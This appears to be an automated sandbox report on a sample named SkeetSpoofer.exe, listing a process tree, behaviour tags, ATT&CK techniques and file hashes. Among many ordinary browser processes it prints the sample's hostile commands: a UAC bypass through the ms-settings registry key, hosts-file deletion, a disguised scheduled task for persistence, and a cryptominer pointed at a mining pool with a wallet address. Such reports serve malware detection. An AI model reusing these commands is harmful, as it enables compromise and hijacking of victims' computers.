"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3224 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:1396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4812 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:1492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4964 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:4576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:3848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4304 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:3844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2744 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:3620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5344 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:2592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=1896 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:4636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:3172

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:1396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5620 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:2096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4860 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:3756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5604 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:3588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4832 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:2440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:2860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5632 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:2312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5884 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:3900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5028 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:1288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6000 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:3184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6104 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:2096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5968 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:4532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5508 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1696

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\SkeetSpoofer (1)\" -ad -an -ai#7zMap16664:94:7zEvent32638
2⤵
- Suspicious use of FindShellTrayWindow
PID:3184

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\SkeetSpoofer\" -ad -an -ai#7zMap7336:86:7zEvent24105
2⤵
- Suspicious use of FindShellTrayWindow
PID:4600

C:\Users\Admin\Downloads\SkeetSpoofer\SkeetSpoofer.exe
"C:\Users\Admin\Downloads\SkeetSpoofer\SkeetSpoofer.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Enumerates system info in registry
PID:3276

C:\Users\Admin\AppData\Local\Temp\skeetresources.exe
"C:\Users\Admin\AppData\Local\Temp\skeetresources.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\jackpear63605335.vbs" /f
4⤵
- Modifies registry class
PID:4580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
4⤵
- Modifies registry class
PID:3144

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C computerdefaults.exe
4⤵
PID:4844

C:\Windows\SysWOW64\ComputerDefaults.exe
computerdefaults.exe
5⤵
PID:2052

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\jackpear63605335.vbs
6⤵
- Checks computer location settings
PID:4800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
7⤵
PID:1404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN BraveUpdateScheduler_QMyk9gHxWJYAojiqe050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\QMyk9gHxWJYAojiqe050MX.exe" /RL HIGHEST /IT
4⤵
PID:3756

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC ONLOGON /TN BraveUpdateScheduler_QMyk9gHxWJYAojiqe050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\QMyk9gHxWJYAojiqe050MX.exe" /RL HIGHEST /IT
5⤵
- Creates scheduled task(s)
PID:2856

C:\Users\Admin\AppData\Local\Temp\gct1wxtq.exe
"C:\Users\Admin\AppData\Local\Temp\gct1wxtq.exe" explorer.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNRk9gHxWJYAojiqe050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RFeFoUDZpuuBYZeQJLR9DzEg3pXiRr7k64/LCRig
4⤵
PID:3576

C:\Users\Admin\AppData\Local\MNRk9gHxWJYAojiqe050MX.exe
C:\Users\Admin\AppData\Local\MNRk9gHxWJYAojiqe050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RFeFoUDZpuuBYZeQJLR9DzEg3pXiRr7k64/LCRig
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3188

C:\Users\Admin\AppData\Local\MNRk9gHxWJYAojiqe050MX.exe
C:\Users\Admin\AppData\Local\MNRk9gHxWJYAojiqe050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RFeFoUDZpuuBYZeQJLR9DzEg3pXiRr7k64/LCRig -RUN -reboot-times 0
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3804

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
3⤵
- Gathers network information
PID:4820

C:\Windows\SysWOW64\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" el
3⤵
PID:1044

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" int ip reset
3⤵
PID:912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Disable-NetAdapter -Name '{E6C18CDF-A46B-4A23-8E77-59E0DF389F25}'; Start-Sleep -Seconds 5; Enable-NetAdapter -Name '{E6C18CDF-A46B-4A23-8E77-59E0DF389F25}'"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:2892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Disable-NetAdapter -Name '{E6C18CDF-A46B-4A23-8E77-59E0DF389F25}'; Start-Sleep -Seconds 5; Enable-NetAdapter -Name '{E6C18CDF-A46B-4A23-8E77-59E0DF389F25}'"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:4292

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Disable-NetAdapter -Name '{E6C18CDF-A46B-4A23-8E77-59E0DF389F25}'; Start-Sleep -Seconds 5; Enable-NetAdapter -Name '{E6C18CDF-A46B-4A23-8E77-59E0DF389F25}'"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:4536

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4464

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1392

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://discord.gg/ZS5f9XHt
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff916b246f8,0x7ff916b24708,0x7ff916b24718
2⤵
PID:3892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
2⤵
PID:2228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
2⤵
PID:2052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2612 /prefetch:8
2⤵
PID:1740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
2⤵
PID:2464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
2⤵
PID:4292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
2⤵
PID:2916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
2⤵
PID:1516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1
2⤵
PID:3056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
2⤵
PID:1496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1
2⤵
PID:3296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
2⤵
PID:1764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
2⤵
PID:5068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6004 /prefetch:8
2⤵
PID:5212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2248 /prefetch:8
2⤵
- Modifies registry class
PID:5220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
2⤵
PID:5536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
2⤵
PID:5544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
2⤵
PID:5684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
2⤵
PID:5692

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:8
2⤵
PID:5880

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12018349318354152590,12051287059114850710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:8
2⤵
PID:916

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1180

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4636

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000017
Filesize
28KB

MD5
8b6a23605542aa5ed08ecf170cc061f2

SHA1
be7a5b58e9aee7eb2d36927b4dc2f0610c3c2cd0

SHA256
138d0a55989a81aede9a115cbbf485a3d91140cb1cb98480358d17c644d2c8d6

SHA512
27d0a5687b2e3c49337d6bf7a46aa46e48d72a4c3e6f5ef810771217bda4a2feb60b002344e26cad2f1700eaddd92f41439a04858822617ecf77b176fc27fd13

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
4KB

MD5
b516a16e2617541413f7cd7494e593ea

SHA1
7f8ec8eb7e87576e1921506689f8508856a4b8ca

SHA256
7d2e85a710a6f755e1f76483bea94be69badeb633f92649827814caab7d7a665

SHA512
ef10b3b7a04a5e3a0863bf40f343858526c1329df195b138e4ce50e8c0982b5dc3e08d08f87580f65e98046e06f10f1398e7e8a72b2d8a21bd488f47dca41dfc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
3KB

MD5
274dad9563580c7e267060db4c4563db

SHA1
cfebe1b2a8c76f990b55ededf8f36a7215410bdb

SHA256
e6a563dcc8c627c34c36e89c9024e9513f871d8087bdb113d38cf15d059486f3

SHA512
23831342c6516c2c93031f142625e941e5c5d30aacf00706ed6d48d725e9823698e8bdb1db7fc7dcd4b88aef05ec0c6ca8feea9ca63bb4d743a027aff919cba6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\Origins\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
Filesize
264KB

MD5
bf883282237e3de2c704d0e043d2881e

SHA1
592b30461407e76e9b8558fd4b5c78d96deed1d7

SHA256
402bde1623dd9a5b99362e56b0d071a9dd725cdac943d811886ca63838b94213

SHA512
8413a6aa79694d60b7b1b0a8906a61812ae56495436a724d71c4e23275aa834a772c20ab98320ed01f9a305d1072a192f2a528b05ff7c8ddbfeb24ee0591eb68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Filesize
31KB

MD5
fe86c7a40fae683f546d10153b37faa1

SHA1
d26cac2684ce3205edfb00061f184cee9351391f

SHA256
e4e67c154aad47ed421c757ef5e73f839084329e17f15a1780c5f50df9fde463

SHA512
d080b5a3eca1bb5715edadc6f800f6eb499be79f98127f03af48512de293aee5b4357bde60dccd476e7d0d8aeb52e2f65a4364cc61b742f6198cd7f492bc2260

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Filesize
332B

MD5
619271e1ba6c9f9cab012d2b6d241852

SHA1
cc258a630cad4d8475c2d393b715fe9439714426

SHA256
a6e25fe5726966e0f7ce8e7e46b7bbb79b95beafffacd8e142a846fa391b8d7a

SHA512
dd758f7042b70f00167dfb730b997d1ff87bdfc04f194bfb676c15cac469f7f02bb683876527624bb503231b78659deeb6dd3eb7966f0202e3fc7eeaf493cc48

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data
Filesize
46KB

MD5
db4d432afaaca6dbcf3693f2108df637

SHA1
2f1178c3ab7b708c5f0a552a56618a658246f697

SHA256
cd32cb9fcf0fe23a265d49aaa92dbed916e48eb587a2135ec708a995848907da

SHA512
9b2f9e40ad253bec8e1e92c89ddd90675ac54c09ec3a4204d01dbee33a6faab71ba0b109ed9bad194fc2f136950023b83cdff33e159d8b800dd69a6303c25558

